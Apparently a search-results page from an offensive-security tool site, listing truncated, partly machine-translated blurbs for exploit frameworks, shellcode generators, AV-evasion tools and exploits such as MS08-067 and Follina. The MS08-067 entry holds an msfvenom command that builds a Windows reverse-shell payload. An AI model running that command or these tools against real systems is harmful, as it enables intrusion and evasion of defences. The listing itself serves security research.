24 matches found
Ninja
Aggiornamento rapido per includere lo sfruttamento di Follina 01/06/2022 - NinjaC2 genererà il documento e servirà il payload HTML. Maggiori informazioni: https://www.linkedin.com/posts/ahmed-khlief-499321a7i-just-pushed-a-quick-update-to-ninjac2-to-activity-6937661951007170560-Tmps Ninja V2.2...
ShellcodeCompiler
Compilatore di Shellcode Shellcode Compiler è un programma che compila codice in stile C/C++ in uno shellcode piccolo, indipendente dalla posizione e senza NULL per Windows x86 e x64 e Linux x86 e x64. È possibile chiamare qualsiasi funzione API di Windows o syscall di Linux in modo intuitivo...
OffensivePipeline
OffensivePipeline OffensivePipeline permite que você baixe e construa ferramentas C, aplicando certas modificações para melhorar sua evasão em exercícios de Red Team. Um uso comum do OffensivePipeline é baixar uma ferramenta de um repositório Git, randomizar certos valores no projeto, compilá-lo,...
ZSC
OWASP ZSC DIESE SOFTWARE WURDE ENTWICKELT, UM ANTIVIREN-TECHNOLOGIEN HERAUSZUFORDERN, NEUE VERSCHLÜSSELUNGSMETHODEN ZU ERFORSCHEN UND SENSITIVE OPEN-SOURCE-DATEIEN MIT WICHTIGEN DATEN ZU SCHÜTZEN. MITWIRKENDE UND DIE OWASP-STIFTUNG ÜBERNEHMEN KEINE VERANTWORTUNG FÜR RECHTSWIDRIGE NUTZUNG. OWASP Z...
nccfsas
Introduction This repository holds information released publicly by NCC Group's Full Spectrum Attack Simulation FSAS team...
shellsploit-framework
We'll back in several years. update...
MS08-067
MS08-067 | CVE-2008-4250 Riferimento: https://learn.microsoft.com/en-us/security-updates/SecurityBulletins/2008/ms08-067?redirectedfrom=MSDN Generazione dello shellcode Useremo msfvenom per generare lo shellcode. root@kitploit: msfvenom -p windows/shellreversetcp LHOST=10.10.14.14 LPORT=443...
astroid
ASTROID v 1.2 root@kitploit: Autor: Mascerano Bachir dev-labs Rechtlicher Hinweis: root@kitploit: Der Autor übernimmt keine Verantwortung für die missbräuchliche Nutzung dieses Tools. Denken Sie daran, dass es nur zu Bildungszwecken dient. Beschreibung: root@kitploit: Dieses Tool generiert...
sickle-pdk
Sickle - पेलोड विकास किट Sickle एक उपकरण है जिसे मैंने मूल रूप से शेलकोड को विकसित करने और समझने में अधिक प्रभावी होने में मदद करने के लिए विकसित किया था। हालांकि, इसके विकास और उपयोग के दौरान यह एक पेलोड विकास किट में विकसित हो गया है। हालांकि वर्तमान मॉड्यूल अधिकतर असेंबली की ओर लक्षित हैं, यह...
micr0_shell
micr0 shell Micr0shell è uno script Python leggero ed efficiente progettato per generare dinamicamente shellcode Windows X64 Position-Independent Code PIC Null-Free per reverse shell. A seconda delle opzioni selezionate, il shellcode generato può essere fino a 27 byte più piccolo di shellcode...
wined
Windows Exploitation wined Tools The following scripts were...
LabExploit
LiveExploit SECURITY RESEARCH TOOL - USE RESPONSIBLY A...
Exploit for Improper Ownership Management in Debian Debian_Linux
Install compilation environment bash sudo apt install -y gcc...
PSKernel-Primitives
This repository, zdiskless/PSKernel-Primitives, is a collection of PowerShell primitives for exploitation. The code includes various functions for generating shellcode, allocating memory, and interacting with the Windows kernel. The functions in this repository are designed to be used in...
Advanced Host Monitor 11.92 beta - Local Buffer Overflow Exploit
Exploit for windows platform in category local exploits !/usr/bin/env python ------------------------------------------------------------------------------------------------------------------------------------ Exploit: Advanced Host Monitor 11.92 beta - Local Buffer Overflow EggHunter Date:...
Linux/x64 - x64 Assembly Shellcode (Generator)
!/usr/bin/env python Features: - Linux shellcode x64 assembly code generation - stack based smaller payload size - execve based - supports long commands meaning bigger than an x64 register - 64 bits - supports long parameters meaning bigger than an x64 register - 64 bits - one command only execve...
AntiVirus Evasion Reconstructed – Veil 3.0
The Veil Framework is a collection of tools designed for use during offensive security testing. When the time calls for it, Mandiant’s Red Team will use the Veil-Framework to help achieve their objective. The most commonly used tool is Veil-Evasion, which can turn an arbitrary script or piece of...
AntiVirus Evasion Reconstructed – Veil 3.0
The Veil Framework is a collection of tools designed for use during offensive security testing. When the time calls for it, Mandiant’s Red Team will use the Veil-Framework to help achieve their objective. The most commonly used tool is Veil-Evasion, which can turn an arbitrary script or piece of...
Linux x86 - Typewriter Shellcode Generator
Linux x86 - Typewriter Shellcode Generator. Shellcode exploit for linx86 platform !/usr/bin/env python Typewriter Shellcode Generator Paw Petersen, SLAE-656 https://www.pawpetersen.dk/typewriter-shellcode-generator-linux-x86/ import sys,struct string = sys.argv1 length = struct.pack"= lenstring: ...
About shellcodes
In this post we have documented a beginners introduction to shellcode writing. We go from zero to a super simple shellcode using tools you may find already installed in any serious operating system. If you are looking for a digested and more mature way of generating shellcode you should check...